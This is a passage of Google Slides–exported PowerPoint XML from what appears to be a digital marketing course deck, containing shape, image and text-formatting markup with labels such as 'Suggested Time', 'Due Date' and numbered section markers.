        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1398" name="Google Shape;1398;p114"/>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399" name="Google Shape;1399;p11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1400" name="Google Shape;1400;p114"/>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401" name="Google Shape;1401;p11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02" name="Google Shape;1402;p114"/>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Suggested Time:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1403" name="Google Shape;1403;p11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04" name="Google Shape;1404;p114"/>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05"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1406" name="Google Shape;1406;p115"/>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07" name="Google Shape;1407;p11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08" name="Google Shape;1408;p115"/>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409" name="Google Shape;1409;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10" name="Google Shape;1410;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11" name="Google Shape;1411;p115"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1412" name="Google Shape;1412;p115"/>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413" name="Google Shape;1413;p115"/>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14" name="Google Shape;1414;p115"/>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15"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1416" name="Google Shape;1416;p116"/>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417" name="Google Shape;1417;p1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8" name="Google Shape;1418;p116"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1419" name="Google Shape;1419;p11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20" name="Google Shape;1420;p116"/>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21" name="Google Shape;1421;p116"/>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22" name="Google Shape;1422;p116"/>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Suggested Time:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423" name="Google Shape;1423;p1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424" name="Google Shape;1424;p116"/>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99"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="Google Shape;100;p3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49803"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p3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 name="Google Shape;102;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21060506" y="10620000"/>
            <a:ext cx="2193986" cy="1896040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="49803"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p3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marR="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Digital Marketing</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p3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FFFFFF"/>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5" name="Google Shape;105;p3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marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="7500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="75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06" name="Google Shape;106;p3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marR="0" lvl="0" algn="r"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1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;p3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marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="29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 2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="Google Shape;108;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2278273" y="2817400"/>
            <a:ext cx="5513298" cy="5513298"/>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425"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1426" name="Google Shape;1426;p117"/>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27" name="Google Shape;1427;p11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28" name="Google Shape;1428;p117"/>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429" name="Google Shape;1429;p117"/>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430" name="Google Shape;1430;p117"/>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31" name="Google Shape;1431;p117"/>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432" name="Google Shape;1432;p117"/>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433" name="Google Shape;1433;p11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pic>
        <p:nvPicPr>
          <p:cNvPr id="1434" name="Google Shape;1434;p117"/>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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1436" name="Google Shape;1436;p118"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="58" b="59"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731329" y="733016"/>
            <a:ext cx="22914989" cy="12246791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1437" name="Google Shape;1437;p118"/>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1438" name="Google Shape;1438;p118"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="208"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2288388" y="2927000"/>
            <a:ext cx="4631755" cy="5280200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="Google Shape;1439;p11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40" name="Google Shape;1440;p118"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1441" name="Google Shape;1441;p11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442" name="Google Shape;1442;p118"/>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marR="0" lvl="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="4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43" name="Google Shape;1443;p118"/>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marR="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Due Date:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1444" name="Google Shape;1444;p11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45" name="Google Shape;1445;p118"/>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46"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1447" name="Google Shape;1447;p119"/>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marR="0" lvl="0" indent="-463550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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1pPr>
            <a:lvl2pPr marL="914400" marR="0" lvl="1"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2pPr>
            <a:lvl3pPr marL="1371600" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="1828800" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="2286000" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2743200" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="3200400" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3657600" marR="0" lvl="7" indent="-463550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" marR="0" lvl="8" indent="-463550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2100"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1448" name="Google Shape;1448;p11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49" name="Google Shape;1449;p119"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1450" name="Google Shape;1450;p119"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="503"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="22013117" y="11202333"/>
            <a:ext cx="1462661" cy="1663773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451" name="Google Shape;1451;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52" name="Google Shape;1452;p119"/>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453" name="Google Shape;1453;p119"/>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454" name="Google Shape;1454;p119"/>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marR="0" lvl="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2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55" name="Google Shape;1455;p11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456"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1457" name="Google Shape;1457;p12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59" name="Google Shape;1459;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460" name="Google Shape;1460;p120"/>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461" name="Google Shape;1461;p12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62" name="Google Shape;1462;p120"/>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463" name="Google Shape;1463;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464" name="Google Shape;1464;p120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="3676879"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1465" name="Google Shape;1465;p12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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1466" name="Google Shape;1466;p12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7" name="Google Shape;1467;p120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="5943313"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1468" name="Google Shape;1468;p12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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1469" name="Google Shape;1469;p12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0" name="Google Shape;1470;p120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="8196979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1471" name="Google Shape;1471;p12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1472" name="Google Shape;1472;p12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73" name="Google Shape;1473;p120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="10463379"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1474" name="Google Shape;1474;p12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1475" name="Google Shape;1475;p12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6" name="Google Shape;1476;p120"/>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77" name="Google Shape;1477;p12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12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12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120"/>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81" name="Google Shape;1481;p120"/>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82" name="Google Shape;1482;p120"/>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483"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1484" name="Google Shape;1484;p12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486" name="Google Shape;1486;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487" name="Google Shape;1487;p121"/>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488" name="Google Shape;1488;p12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489" name="Google Shape;1489;p121"/>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490" name="Google Shape;1490;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491" name="Google Shape;1491;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3467313"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1492" name="Google Shape;1492;p12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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1493" name="Google Shape;1493;p12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4" name="Google Shape;1494;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="5333713"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1495" name="Google Shape;1495;p12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000000"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Thin"/>
                  <a:ea typeface="Roboto Thin"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1496" name="Google Shape;1496;p12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7" name="Google Shape;1497;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="7180979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1498" name="Google Shape;1498;p12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1499" name="Google Shape;1499;p12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0" name="Google Shape;1500;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="9040979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1501" name="Google Shape;1501;p12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1502" name="Google Shape;1502;p12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3" name="Google Shape;1503;p121"/>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04" name="Google Shape;1504;p12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12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12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21"/>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08" name="Google Shape;1508;p121"/>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09" name="Google Shape;1509;p121"/>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510" name="Google Shape;1510;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1251686" y="10888246"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1511" name="Google Shape;1511;p121"/>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1512" name="Google Shape;1512;p121"/>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3" name="Google Shape;1513;p12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121"/>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515"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1516" name="Google Shape;1516;p12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18" name="Google Shape;1518;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519" name="Google Shape;1519;p122"/>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520" name="Google Shape;1520;p12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21" name="Google Shape;1521;p122"/>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522" name="Google Shape;1522;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523" name="Google Shape;1523;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3300915"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1524" name="Google Shape;1524;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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1525" name="Google Shape;1525;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26" name="Google Shape;1526;p122"/>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27" name="Google Shape;1527;p12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8" name="Google Shape;1528;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="4877115"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1529" name="Google Shape;1529;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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1530" name="Google Shape;1530;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1" name="Google Shape;1531;p12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2" name="Google Shape;1532;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="6453315"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
